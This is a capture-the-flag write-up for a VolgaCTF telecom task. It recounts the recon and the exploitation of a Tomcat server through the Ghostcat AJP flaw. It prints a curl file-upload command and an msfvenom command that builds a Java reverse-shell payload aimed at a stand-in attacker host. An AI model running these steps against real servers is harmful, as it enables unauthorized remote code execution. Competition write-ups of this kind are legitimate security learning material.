Description:
Another telecom provider. Hope these guys prepared well enough for the network load…
Authors: g0dfuzzer, ne_bknn
No, you did not need to DoS this one.
The service has very limited functionality, there’s nothing to pwn on the front page. So I made some checks — launched dirb with bo0om’s fuzz.txt and scanned server’s ports.
Dirb revealed /examples and /docs directories. Nmap showed that 8009 port is open, but somehow I didn’t check it, my thoughts were that this is yet another task hosted on this machine.
So, this is Apache Tomcat. I spend way too much time on exploring /examples when I should have been looking at /docs. /docs shows us Tomcat’s version and this is crucial. Being desperate, I googled “apache tomcat CVE” and found that this very version is vulnerable to ghostcat attack. And to exploit it we need Tomcat’s 8009 port open. The port that I didn’t check several hours ago.
Found a chinese PoC, got LFI on a server. WEB-INF/web.xml disclosed that there is a previously unknown servlet, namely ServeScreenshotServlet.class. Downloaded it, decompiled, found file upload functionality.
The example of file upload:
curl -F filename=@file -F submit=true http://netcorp.q.2020.volgactf.ru:7782/ServeScreenshotThe servlet puts files inside /uploads directory, with the name that is a hash value of the real name.
Ghostcat can evaluate java payloads, let’s make use of it.
msfvenom -p java/jsp_shell_reverse_tcp lhost=ATTACKER lport=1337 > shell.jarUpload the file using aforementioned command, use ghostcat to run reverse shell. Session popped! cat flag.txt
